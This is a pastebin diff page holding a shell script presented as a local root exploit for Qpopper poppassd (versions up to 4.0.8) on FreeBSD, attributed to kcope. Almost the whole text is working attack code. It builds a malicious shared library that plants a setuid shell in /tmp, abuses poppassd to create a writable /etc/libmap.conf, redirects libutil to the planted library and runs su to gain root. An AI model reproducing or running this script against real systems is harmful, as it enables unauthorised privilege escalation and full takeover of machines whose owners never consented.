View difference between Paste ID: FbYjXJic and cPqW03yn
SHOW: | | - or go back to the newest paste.
1
========================================================
2
Qpopper <= 4.0.8 (poppassd) Local Root Exploit (freebsd)
3
========================================================
4
 
5
 
6
#!/bin/sh
7
###########################################################################
8
# FreeBSD Qpopper poppassd latest version local r00t exploit by kcope   ###
9
# tested on FreeBSD 5.4-RELEASE                                         ###
10
###########################################################################
11
 
12
POPPASSD_PATH=/usr/local/bin/poppassd
13
HOOKLIB=libutil.so.4
14
 
15
echo ""
16
echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope"
17
echo ""
18
sleep 2
19
umask 0000
20
if [ -f /etc/libmap.conf ]; then
21
echo "OOPS /etc/libmap.conf already exists.. exploit failed!"
22
exit
23
fi
24
cat > program.c << _EOF
25
#include <unistd.h>
26
#include <stdio.h>
27
#include <sys/types.h>
28
#include <stdlib.h>
29
 
30
void _init()
31
{
32
 if (!geteuid()) {
33
 remove("/etc/libmap.conf");
34
 execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
35
 }
36
}
37
 
38
_EOF
39
gcc -o program.o -c program.c -fPIC
40
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
41
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
42
echo "--- Now type ENTER ---"
43
echo ""
44
$POPPASSD_PATH -t /etc/libmap.conf
45
echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf
46
su
47
if [ -f /tmp/xxxx ]; then
48
echo "IT'S A ROOTSHELL!!!"
49
/tmp/xxxx
50
else
51
echo "Sorry, exploit failed."
52
fi
53
 
54
 
55
 
56
# 056FE58749E5C4AA   1337day.com [2014-09-08]   3CFC11BFC696FCE0 #